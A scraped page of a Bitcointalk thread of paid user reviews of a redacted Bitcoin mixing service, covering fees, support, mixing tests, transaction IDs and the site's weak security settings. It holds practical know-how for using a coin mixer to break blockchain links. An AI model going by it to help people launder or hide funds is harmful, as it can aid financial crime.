Bitcoin Forum
May 06, 2024, 02:05:13 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 [6] 7 »  All
  Print  
Author Topic: [CLOSE] [banned mixer] Bitcoin Mixer Review#1| 6mBTC+Lifetime 50% OFF | Bonus 10mBTC  (Read 2527 times)
Learn Bitcoin
Hero Member
*****
Offline Offline

Activity: 518
Merit: 822


#SWGT CERTIK Audited


View Profile WWW
September 26, 2023, 03:32:33 PM
 #101

 [banned mixer] review 

Bitcointalk username: Learn Bitcoin


I started using ]https://[banned mixer] with the Clearnet domain. The website UI looks good, but I was searching to switch to Night mode as I wouldn't say I like using bright screens. Even though we can use night mode features with the help of some modifications on the browser, I would recommend the Tumbler team to implement the night mode feature if possible. The website is available in eight languages, which is impressive. Their tor mirror is http://[banned mixer]/

 Fees 
The minimum fee is comparatively low, only 0.4% + 0.0002 BTC and the maximum fee is 5%, which increases the security level to a premium. I have seen some mixers where the minimum fee is almost 5 to 10 times more than [banned mixer]. I have checked four more mixers as of writing, and [banned mixer] has the lowest fees when I am writing this review. I was searching for how much is the additional fees for each receiving address in the FAQ section, but I didn't find it there. The information can be found once the user starts a new order, enters the addresses and then clicks on Fee Calculator to expand it. I would recommend decreasing the fees when users add additional addresses. For example, 0.0001 BTC for each address if the user adds more than five addresses.

The good news for whales is that 0.4% is not the lowest fee. The lowest fee is 0.20% if someone mixes more than 100 Bitcoins. But the max amount, for now, is 10 Bitcoin, and they suggest contacting support if someone wants to mix a large amount of Bitcoin. More details about fees can be found here: /fee]https://[banned mixer]/fee

 Support 
I haven't seen live chat support in any mixers yet, and [banned mixer] also does not have it. I won't blame them, as it may trigger privacy issues. I have opened a support chat to check how long they take to respond, but I did not get any response within an hour. It's already mentioned that they will answer within 12 hours. At first, I thought maybe it was live chat. The problem is that users must copy and save their support page link. Relying on the old conversation is impossible if the user closes the support tab.

Unlike other platforms, it has no other support channels like Telegram and Email. The footer page contains two social media links (X/Twitter and Bitcointalk), but I don't know if they would provide any support through those channels. So, I recommend adding more support channels (at least email and telegram) as those platforms do not hamper privacy.

 Mixing #1 
Type: Premium
Fee: 4%
Delay: 3 Hours 21 Minutes
Browser: Microsoft Edge.


A user mentioned that he could not select Bitcoin distribution by address in percentage terms. I don't know if I got him wrong, But I was able to select the percentage for the addresses I entered. I had a round point slider for each address to change the percentage. See the image below to understand If I am confusing here.


I won't write the steps as mixer users are already familiar with those steps. I received a P2SH deposit address. Most of the time, I have seen mixers use bech32 addresses. I don't know if it has any advantages or disadvantages. But I don't remember if I have seen mixers provide P2SH addresses. The minimum confirmation is 1, which is a standard. I have chosen 3 hours as mixing time as [banned mixer] recommends a minimum of two hours to increase the mixing strength. Even though [banned mixer] does not support the Taproot address at this moment, they will add it later. So, users won't have to check the FAQ before they write the taproot address. I just double-checked that it's impossible to continue the order with a taproot address—big thumbs up. The mixing is ongoing at this moment. I might edit it later and add more details.



 Mixing #2 
Type: Standard
Fee: 1.8%
Delay: 11 Minutes
Browser: Google Chrome.


I have used the Tumbler code from my first mixing this time, even knowing that I won't get any special discount. There is nothing special to add since everything is almost the same. I received the P2SH address again. I am not sure if [banned mixer] currently uses P2SH deposit addresses only. I have downloaded the letter of guarantee both times to keep the data of my transactions in case anything happens. Oh, one more thing: I was almost going to send Bitcoin to the first deposit address, but fortunately, I double-checked the address. The website says
Quote
We don't support multiple deposits to the same receiving address.
What if I make a deposit twice at that address? My deposit is still pending for 30 minutes because I paid 20 sat per byte, and the recommended fee was slightly higher than that. Let's say I forgot to bump the transaction fees, or I cannot, and the transaction was confirmed after 24 hours. What will happen to my deposit? Is it lost, or can I get a refund?



 Suggestions 

  • Add more support Channels like Email, Telegram
  • Decrease the fees when user add multiple receiving address(Make it dynamic if possible)
  • Add Nightmode version
  • Implement Note system/ Pay to friend system by codes
  • Explain multiple deposits to the same address and deposits made after 24 hours in the F.A.Q page


 Pros! 
  • Support Multiple languages (Eight languages)
  • Several mixing options (Basic, Standard, Premium)
  • Well explained F.A.Q
  • Easy to navigate
  • Fee calculator before creating the order

 Cons! 
  • Nightmode not available
  • Does not support Taproot address
  • Limited support channels
  • It is not possible to continue the previous support conversation once the tab is closed



1715004313
Hero Member
*
Offline Offline

Posts: 1715004313

View Profile Personal Message (Offline)

Ignore
1715004313
Reply with quote  #2

1715004313
Report to moderator
No Gods or Kings. Only Bitcoin
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
1715004313
Hero Member
*
Offline Offline

Posts: 1715004313

View Profile Personal Message (Offline)

Ignore
1715004313
Reply with quote  #2

1715004313
Report to moderator
1715004313
Hero Member
*
Offline Offline

Posts: 1715004313

View Profile Personal Message (Offline)

Ignore
1715004313
Reply with quote  #2

1715004313
Report to moderator
1715004313
Hero Member
*
Offline Offline

Posts: 1715004313

View Profile Personal Message (Offline)

Ignore
1715004313
Reply with quote  #2

1715004313
Report to moderator
Charles-Tim
Legendary
*
Offline Offline

Activity: 1540
Merit: 4845



View Profile
September 26, 2023, 03:38:27 PM
Last edit: September 26, 2023, 04:27:08 PM by Charles-Tim
 #102

It is not possible to continue the previous support conversation once the tab is closed
It is supporting onion address. On the main page of the website, scroll down and you will see it:




But it will be good if it is more visible. Having it underneath the website will make it not visible to some people.

You can also see it on their announcement thread on this forum: ➡️➡️ [ANN] | ‌‌‌‌‌‌‌.‌‌ | Bitcoin Mixer ⬅️⬅️



It is not possible to continue the previous support conversation once the tab is closed
It will give you a link which you can use to always access their support. If you paste the link on a browser, it will always open this support page for you on the browser:



Previous conversations are not deleted.

But I hope they will work on the letter of guarantee, it is not opening.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
Agbe
Hero Member
*****
Offline Offline

Activity: 882
Merit: 1253


View Profile
September 26, 2023, 03:48:48 PM
 #103

To be honest, this is one of the best bitcoin mixers that I have used before.

You can say that again. This is the first mixer that I have used to mix coins and I really enjoyed the process. There was no stress to do it and everything was just simple. I don't think any of the competitors in the forum has a simple mixing interface like this mixer. I have been trying to use a mixer since but no one was seeming to be beginners friendly but [banned mixer] is the newbie friendly and the best in the forum right now. The only experienced I faced was the delay of the payout. It took 4-5 hours before it arrived in the recipient address which he also confirm and told me. And one thing I will say is that, they should add some features on the home page. Please this is not a review but a carnal knowledge of the mixing service. Since the service is very simple to use let the security is very tight and we'll secured.
SmartGold01
Hero Member
*****
Offline Offline

Activity: 686
Merit: 731


Don't joke with my Daughter


View Profile WWW
September 26, 2023, 06:03:55 PM
Last edit: September 26, 2023, 07:31:01 PM by SmartGold01
 #104

Bitcointalk Username: SmartGold01

[banned mixer] Bitcoin Mixer Review

A reviewed carried out on Chrome browser At first trying to get my tumbler code were kind of confusing to me but said (optional), I then further to create a receiving addressing from Electrum wallet after which it was proceed and deposit was made from My binance exchange to system generated address.



System Interface
From my review I noticed this and decided to bring it up since is what is on the process, what I noticed again was the interface, it looks cool but on the other hand it should at least have a color swapping mode whereby one can decides to switch between colors either dark and white or other colors that suits with the eyes especially, there are people who aren't good with white screen that much maybe such people could switched between the colors to use their preferred color to suits their eyes.


Further more, A deposit was confirmed and preparing the order for mixing payout it was like a kind of shocking to me to work so quickly and smoothly without even considering how much long it takes for confirmations, although at some point was given notice stating "You must know!
Using the tumbler code guarantees that you will not receive your own coins on the next order!
Your tumbler code for the next order: .....1719e4808983" At some moment was waiting for the mixing and payout.


The time given for the mixing and payout was about 10hrs from the time of transaction (txt id gives you accurate moment) which makes it unbearable for me to excise this patient to keep waiting.


For the deposit:
The minimal deposit was little bit huge, I suggest the minimal deposit should be reduced and fit on 0.0005BTC or below reason being that this could be more challenging in the near future when bitcoin prices might have surge above this presents prices and 0.001BTC could be a challenging amount for those who wants to use this services for a minimal amount lower than the required amount (minimal deposit) as mixing service who wants to remain the top among all and that wants to remain first option for people and its users, their service minimal deposit should be reduced to enable the platform attract more clients an customers to often patronized their services.


Languages:
Sincerely speaking was shocked to see this mixer has a multiple language support option such as Germany, Russian, French, Japanese, Chinese. Spanish, Italian which made it language friendly and people could easily locate their languages to use. Although my native local language was not listed here but was comfortable with the English version which I can read and understood site perfectly  


Support Team



I tried to teste run the support team but it seems it was too late for a request to be handled, usually as a support team whenever a request is made is either they should respond in the next 2 to 5 minutes to enable user have full confidence of their mixing process to avoid breach of trusted. Most time respond team are the people to rely on for emergency and immediate feedback are always wanted by people to fixed up their issues.



Address:
txt: 0453523a8799faf8f162d2c779df284ca266f56a805110dd19f911c3ffdbb9c4

.
SPIN

       ▄▄▄██████████▄▄▄
     ▄███████████████████▄
   ▄██████████▀▀███████████▄
   ██████████    ███████████
 ▄██████████      ▀█████████▄
▄██████████        ▀█████████▄
█████████▀▀   ▄▄    ▀▀▀███████
█████████▄▄  ████▄▄███████████
███████▀  ▀▀███▀      ▀███████
▀█████▀          ▄█▄   ▀█████▀
 ▀███▀   ▄▄▄  ▄█████▄   ▀███▀
   ██████████████████▄▄▄███
   ▀██████████████████████▀
     ▀▀████████████████▀▀
        ▀▀▀█████████▀▀▀
.
RIUM
.
███
███
███
███
███
███
███
███
███
███
███
███
SAFE GAMES
WITH WITHDRAWALS
       ▄▀▀▀▀▀▀▄▄▄▄
 ▄▀▀▀▀▀▀▀▀▀▀▀▀▄  ▀▀▄
█    ▄         █   ▀▌
█   █ █        █    ▌
█      ▄█▄     █   ▐
█     ▄███▄    █   ▌
█    ███████   █  ▐
█    ▀▀ █ ▀▀   █  ▌
█     ▄███▄    █ ▐
█              █▐▌
█        █ █   █▌
 ▀▄▄▄▄▄▄▄▄█▄▄▄▀
       ▄▀▀▀▀▀▀▄▄▄▄
 ▄▀▀▀▀▀▀▀▀▀▀▀▀▄  ▀▀▄
█    ▄         █   ▀▌
█   █ █        █    ▌
█      ▄█▄     █   ▐
█     ▄███▄    █   ▌
█    ███████   █  ▐
█    ▀▀ █ ▀▀   █  ▌
█     ▄███▄    █ ▐
█              █▐▌
█        █ █   █▌
 ▀▄▄▄▄▄▄▄▄█▄▄▄▀
.
███
███
███
███
███
███
███
███
███
███
███
███
.
.SIGN UP.
BlackHatCoiner
Legendary
*
Online Online

Activity: 1512
Merit: 7353


Farewell, Leo


View Profile
September 27, 2023, 12:13:55 PM
Last edit: October 23, 2023, 08:30:34 AM by BlackHatCoiner
 #105

To all the reviewers: When hiding addresses in your images, take care of hiding the entire text. If you let a couple of characters visible then it's trivial for anyone reading to figure out the entire address.


Reviewing [banned mixer]

Mixers are increasingly becoming less appealing as solutions when compared to trustless techniques like coinjoins and XMR swaps over time. Therefore, for a mixer to be deemed competitive in today's landscape, it must meet a plethora of criteria. For that reason, I will try to be as much strict and constructive as possible.

1. First impression
I'd like to comment a couple of things before I make any deposits. Let me break them down.

Security
  • You rely on javascript. I strongly recommend you to either let people audit the code of both your front-end and back-end, or get rid of javascript completely. As far as I can tell, you're using /js/172201f7603a4c7f9dae6231933cbbde.js]jQuery which is known to suffer from several vulnerabilities. Can you tell which version is it? You should not use anything beyond the latest version, as it is known to having vulnerabilities. These particular XSS vulnerabilities can let an attacker inject malicious code into your page. (I don't believe you really need javascript, there have been large mixers without javascript in the past)
  • /2356646]You have not DNSSEC enabled, which can significantly reduce the risk of various DNS-based attacks, such as DNS spoofing, cache poisoning, and man-in-the-middle attacks.
  • You have not set the Content-Security-Policy header (which protects from cross-site scripting).

Privacy policy
I'm a little bit hesitant to using this mixer after reading its privacy policy. So, I'm basically agreeing that [banned mixer] implements coin filtering and I'm forbidden to using it if my coins are included in some illegal activity. I'd expect better policy from a service that is trying to enhance Bitcoin's privacy (and coincidentally, its fungibility).
Quote from: https://[banned mixer
/terms]4. PROHIBITED ACTIVITIES and COIN FILTERING

You accept not to engage "The Service" in any illegal activity or not to use "The Service" to adversely affect the performance or provision of services by "The Service". In addition, You accept not to use any Bitcoin created, received, or granted in exchange for or as a result of any illegal activity in "The Service".

[...]

COIN FILTERING

"The Service" may carry out verification and control of illegal activities with the help of a third party under a contract. "The Service" may terminate Your access to "The Service" with immediate effect for any reason - including, but not limited to, illegal or prohibited activities, at its sole discretion, and is not obligated to reveal the details of its decision.
You accept that "The Service's" decision to take certain actions, including termination for any reason at its sole discretion, may be based on confidentiality criteria that are necessary for "The Service's" security protocols and risk management. You accept "The Service" is not obligated to reveal to you the particularities of its security and risk management processes.

In addition, the user has to accept that they will not be revealed the reason their coins were rejected. I want more information and explanation on this. Why are you doing it? Bitcoins are fungible. Why do you treat the currency as non-fungible? It harms it as currency. How can the user trust a service with the aim to improve fungibility if the service itself doesn't treat it likewise? And which is the procedure followed if you deem their coins as "tainted"? Do you return them back to their address? The user will hesitate to using this, if there's a chance to confiscate their money (which seems to be).

The rest of your privacy policy seems fine.

Your FAQ page
Was this written on the go? Looks sketchy. There are lots of spelling mistakes like "brake", "concerned as a donation", "P2SH or Compatibility Address Format" (since when is P2SH called like that?).

I find your FAQ ambiguous.
  • For example, in "Can I trust with you large amounts of BTC", what should the user do in bitcointalk anyway? Leaving it in splitting the amount in multiple deposits would be fine.
  • Another question that comes to my mind is: is the user charged the mining fees? In other words, do service fees include the mining fees? You should clarify everything when it comes to the costs.
  • In "Do you save any logs?", I'd correct it to "We do not keep any logs". You do save information, otherwise you wouldn't be able to delete it.  Tongue
  • You're writing "We use a TUMBLER CODE to be sure that you will not get your funds back". I'd change it to "We use a Tumbler code to be sure your coins will not have a blockchain connection". The former looks just bad.
  • I suggest you to remove bitcoin.com from the linked page for verifying signatures. There are far better, open-source tools for verifying a message, without accepting bitcoin.com's strict privacy policy. Namely, Electrum.


A Bitcoin user seeking privacy would regard the operator of this service as inexperienced. This is my first impression. Assuming you address these concerns, let's proceed to the crucial aspect; mixing.




At first, I'll be using Tor Browser v12.5.4.

Okay, so the design is pretty neat (even though I don't prioritize it at all). We have tumbler code, receiving address(es), service fee, fee calculator, delay, and an anonymizing meter. Again, let me correct a grammar mistake; in the question mark of the anonymizing meter, you would want "effective" anonymization, not "efficient". As for the "Security Level", as a reviewer I'm going to try them all, but honestly, as a user, you haven't convinced me of any particular essence. Where do Basic level coins originate from, I cannot make any sense. Let me quote it for you;
Quote
Basic level uses a pool that operates on a "peer-to-peer" system, wherein assets for payments to new customers are generated from bitcoins received from other customers.

Buzzwords, if you ask me. What "peer-to-peer" system, which customers, all of which happen where? Same applies for Standard and Premium:
Quote
Standard Level - its funds are coming from large Basic Level transactions, private resources of the system and depositors' bitcoins. For this reason, Standard Level funds are large.

Quote
Premium Level fund is not associated with Basic Level bitcoins. This premium pool contains the system's private resources and depositors' bitcoins.

What is a "private resource"? What's the difference between Standard and Premium? They both provide "private resources" as far as I can see. Seriously, did you write this in a hurry?

Anyway, let's move on.

Security level: Basic
To start with, let me try out mixing with the weakest anonymity meter, so I can tell how bad that is.
Parameters:
Code:
- Service fee: 0.4%
- Delay: 0
- Total receiving addresses: 1

I hit continue, I get warned for [banned mixer]'s sending address and terms of use, letter of guarantee is downloaded (and signature verified), coins are deposited.

A little while later, after waiting for confirmation, I got this:


Not the best thing that can happen to a mixer user.

So, a couple of minutes after I sent them a message, they responded with this:
Quote from: [banned mixer
support]Dear ---- ---------,
Thank you for contacting us with a request for assistance!

Our system detected that you sent money more than once to the deposit address. Maybe you tried to increase commission that is considered by our service the same. We can make a refund to one of the addresses specified in the output list or to the address from which we received the money. Otherwise we can make refund to address that you sent deposit from:

1. [removed]
2. [removed]

Which address do you prefer for a refund?
]
We’re glad you chose the our project. If there is anything else we can do to help, please let us know.

Best regards,
Support team

This is bad. Your system shouldn't consider replace-by-fee as a separate transaction. It's literally replacing, as the name suggests, the older transaction. Also, why am I one who paid the error? I sent 100,000 sat, received a few thousand less. It isn't my fault than you don't take into consideration RBF, you should at least warn somehow during the mixing process.

Attempt #2. Everything worked, I didn't use RBF and I instantly got my mixed funds. So, at this point I'm going to share the TXID, so people can check and rate the anonymity set.  

Received bitcoin in: bc1qvmgfa9zedvh8ger43yv9mju8t5aw275vpa5tu9. Coin history of the the address that paid me looks like this. Very average, could have accomplished better levels of privacy with a small Joinmarket coinjoin.




Security level: Standard

Parameters:
Code:
- Service fee: 1.80%
- Delay: 0
- Total receiving addresses: 1

Received bitcoin in: bc1qthpl93rv7908hyr46w8sr52kcz9ynxvt5mt3hc.

Coin history looks as following. Seems like the address that sent coins to [banned mixer]'s withdrawal address comes from some sort of exchange? I searched for it in walletexplorer.com, and as it turns out, it belongs to one of the wallets they're actively tracing. I wouldn't want my mixed bitcoin to be related to that. Additionally, I don't acknowledge much greater levels of privacy than with Basic. Let's move onto Premium.




Security level: Premium

At this point, I'll be using Chromium browser (117.0.5938.92) in Ubuntu 22.04.
Parameters:
Code:
- Service fee: 3.60%
- Delay:  1hr. 46min, 3hr. 38min respectively
- Total receiving addresses: 2

Let me confirm that I will get my coins on time.  

(3hr. 38min later)
Alright, so I do confirm that I've got the coins on time. Coins received in - bc1qjeej3ahzvwkekaem069r25enxrm0vgh0yd06qv - and - bc1q5z8gq8er4aw4stl6fj48wmreeq409lywu32esg. Let's have a look on each coin history.


That's pretty disappointing. I paid for premium, anonymizing meter signaled "Strong", used Tumbler code to let the service know with which outputs I don't want my mixed coins be connected with, and instead, I got one mixing and two regular transactions which are directly connected. Literally, the former is the change of the other.

If the images confuse you, let me use ASCII:
Code:
                     (#1 withdrawal)
                      ┌───────────┐
                  ┌──►│bc1q...06qv│      (#2 withdrawal)
┌─────────────┐   │   └───────────┘       ┌───────────┐
│3ELb...v2MJZ9├───┤                   ┌──►│bc1q...2esg│
└─────────────┘   │   ┌───────────┐   │   └───────────┘
                  └──►│3GAha...rhb├───┤
                      └───────────┘   │   ┌───────────┐
                     (mixer change)   └──►│3AuK...zabP│
                                          └───────────┘
                                         (mixer change)




Conclusions

This is a very bad mixer. Sorry, but I'm being paid to tell the truth here. I'm genuinely curious as to what the rest of the users see that I don't.

Here's a list of your cons that you should absolutely work on:
  • Actual mixing. When the user receives mixed coins, they have to look mixed. That's the point of the mixer; to improve fungibility and privacy, and the manner to accomplish it is to make it difficult for outsiders to de-anonymize known-mixer outputs. However, there needs to be a discernible indicator that these coins indeed originated from a mixer, so that anyone attempting to trace them can give up.
  • Privacy policy. As I previously said, the user expects you to treat them equally. They want fungible outputs, you must treat theirs equally. That's your job. To take "tainted" / "bad" / whatever coins and create completely indistinguishable / fungible coins.
  • "Security levels". The user has no manner to verify whatsoever how their "Premium" coins are more private; which is a lie in the first place as I demonstrated. Premium coins which I expected to withdraw on different addresses, were withdrawn with direct blockchain connection. Minimum privacy there.
  • Pricing. Please explain me why each receiving address costs an additional 20,000 sat. Your fee range of 0.4% to 3.60% is quite reasonable. However, as you've acknowledged, I didn't receive an equally good product for the price I paid when comparing the "Basic" and "Premium" options.
  • The site's ambiguity is pretty unattractive and demonstrates amateurism.
  • Javascript requirement is concerning, provided that mixers are targets for DDoS and other sort of attacks.

Here are some less significant things to account for:
  • Segwit nested in deposit addresses. Both you and the users can enjoy less expenses if you only use Segwit native. (the argument of "using different address types for better privacy" I've previously read above is ridiculous)
  • Replace chat with e-mail support. It's just more professional and user-friendly IMO. If message privacy is a concern (which should be), add a PGP public key.
  • Separate blogging. You don't really need a blog under the same place where the mixer is. It increases the chances of someone exploiting a vulnerability. The more the scripting under [banned mixer], the more the attack vectors. If you really want a blog, just rent another server and run it under a sub-domain (i.e., blog.[banned mixer]). It depends, at least, on under which script is this blog running. That's another reason why you should let the people audit the code.
  • Overpaying in fees. I checked your transactions, and it appeared that every single time, you used at least the maximum fee. Nor the user, neither you need to lose money on that, if the user clarifies that they are not in a hurry.
  • Languages are problematic, and that's why I'd recommend you to keeping it English only. For instance, if you change the language, blog posts or terms of use aren't translated.
  • Genuinely curious: do you really need a 278kb (!!!) /css/75139cd7b255a51d80cca418c007a487.css]css file? If I asked you to describe me in detail what it does, would you confidently answer that? You're trading security for comfort here.

I will edit this post in the future if needed.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
dkbit98
Legendary
*
Offline Offline

Activity: 2226
Merit: 7129



View Profile WWW
September 27, 2023, 07:53:43 PM
 #106

My [banned mixer] Review


I spent last few days checking out Tumbler website and testing how mixing is actually working.
Tumbler website is opening fast both on clearnet and on Tor using onion addresses, I didn't have any issues with slow speed when opening pages.
Website design is ok, it's clean, and I didn't notice any big spelling mistakes, but first thing that caught my eye was Absolutely Reliable claim on main page.
Either Tumbler has hired gipsy fortune teller or they have top secret time traveling machine when they are already claiming to have many positive customer reviews on forums, and they just recently started this service.
Note that after finishing my mixing I was presented with a button to write a review, and it was redirecting only to their bitcointalk forum topic.


?!

Quote
Domain Name: [banned mixer]
Registry Domain ID: a125c22891314450a0ca936b538ab16f-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2023-09-04T05:47:04Z
https://www.whois.com/whois/[banned mixer]

Fees page is saying that fees are smaller when larger amount of Bitcoin is sent for mixing, and they still boldly claim that for 100 or more BTC there is 50% discount and 0.20% service fee.
I will have to say that I really suspect they have 100 or more Bitcoin, unless they are using other centralized services, but I will talk more about that later.
When they first appeared in bitcointalk I asked them this question and I think they rchanged 100 btc claim to 10 btc in FAQ page, but it's still there in Fees page.



After I finished reading FAQ and Fee page (everyone should do this) I continued to mixing page.
This page opens sometimes with simple Captcha security and sometimes without it, but it's easy to understand everything.
There are three types of Service fee, and first I used BASIC level with my Tor browser, with delay that showed Good Anonymizing meter at the page bottom.


 
I can confirm that up to 10 addresses can be used for receiving coins from Tumbler after mixing, but I didn't use all of them, it's waste of fees for smaller amounts.



This is where I received my first error or bug while I was testing Tumbler, and I was asked to refresh browser and continue.
I talked with Tumbler Support team and they responded within 20 to 30 minutes, but I was not given any explanation why this happened.
My theory is because I had multiple tabs from Tumbler website, don't I can't be sure of that.
Here are few screenshots with error and my conversation with support:

 

After refreshing the page I needed to start all over again, I sent my coins and I downloaded Letter of Guarantee.
After waiting period was finished I received coins on my address, minus service fees, and I didn't find any connection with my previous coins.



However, I did found connection with something that looks like big centralized exchange, so it's possible that Tumbler is just using their exchange account for ''mixing'' coins.  Tongue
I can't prove my claims and I didn't have time for deeper blockchain address analytics, but I would liker to hear how Tumbler can explain this.
Centralized exchange have nothing to do with Coinjon that is mentioned on Tumbler website.
Anyway this ends my first testing with Tor browsers and basic security level.

For second browser I used Brave browser and I switched to dark theme on Tumbler website that looks nice for a change.



This time I used higher fees and Basic Security Level, but I didn't see any significant change in blockchain explorer after mixing was finished, except that I was charged more.
There was no connection with my previous coins and I used code from previous mixing, but I didn't notice any coinjoins in transaction history.





Tumbler worked almost the same with both browsers, Tor and Brave browser, but I received one error only with Tor browser.

After mixing was finished there was clock countdown until order information will be released, but I think it would be better to add option manual deletion by user.
I can't verify if this will really be deleted properly or not, but I will check and confirm here what is going to happened after times expires.



I also want to use manual delete option for Support chat.
I talked with support once but this link will be available for 48 hours, but manual delete option should be added from user side.

Conclusion:
Overall I am really suspicious towards all new mixer after few recent incidents that happened, and Tumbler really needs to explain several things regarding their mixing process.
If they are using third parties and centralized exchanges than I would not recommend anyone using this website for mixing any larger amount of coins.
There is a a chance coins could be rejected or confiscated for whatever reason, and I didn't see any proof that Tumbler owns 100 or even 10 BTC.
Lot of improvement is needed and only way forward is to be honest and transparent as much as possible, I know this is paradox for mixing service, but it must be like that.
Until I see more clarification from Tumbler I won't use or recommend their service.

PS
There is a chance I could change/update my review in next 48 hours.

.
.HUGE.
▄██████████▄▄
▄█████████████████▄
▄█████████████████████▄
▄███████████████████████▄
▄█████████████████████████▄
███████▌██▌▐██▐██▐████▄███
████▐██▐████▌██▌██▌██▌██
█████▀███▀███▀▐██▐██▐█████

▀█████████████████████████▀

▀███████████████████████▀

▀█████████████████████▀

▀█████████████████▀

▀██████████▀▀
█▀▀▀▀











█▄▄▄▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
.
CASINSPORTSBOOK
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀▀█











▄▄▄▄█
stompix
Legendary
*
Offline Offline

Activity: 2884
Merit: 6294


Blackjack.fun


View Profile
September 28, 2023, 08:11:50 AM
 #107

Here we go, my test of [banned mixer]

Since this was a test as much as you can and not a tutorial I've tried to do a few stupid things, that's why I tried the second time to test an already highlighted issue. Two tests plus another one that will end in under 24h, 2 browsers Chrome, and Firefox over clearnet with basic and intermediate and TOR

First impression from browsing the website

Website speed
To be honest I'm actually impressed since playing around over a ton of VPNs it loaded flawlessly, USA, South Africa, Australia, and Korea and I had no loading issues whatsoever, impressive since on the ann topic I've read about a continuous DDOS. Same with TOR, no hiccups!

Going through the FAQ:
- the Javascript thing, it's been said a lot of times it's vulnerable, the claims about the website not being able to run without, mixed feelings about it

The TOS page:
Quote
In addition, You accept not to use any Bitcoin created, received, or granted in exchange for or as a result of any illegal activity in "The Service". The prohibited activities in this section include, but are not limited to, the following prohibited activities:
~
- providing debt settlement service or credit repair;
- obvious sexual content.

You must be joking!   Roll Eyes

Quote
"The Service" may carry out verification and control of illegal activities with the help of a third party under a contract. "The Service" may terminate Your access to "The Service" with immediate effect for any reason

How do you terminate my access?  Grin

Language settings:

Browsing through the website, and changing the language makes you go to the first page. Not the thing you want to experience the first time when you're using the website and have already mixed some coins cause from
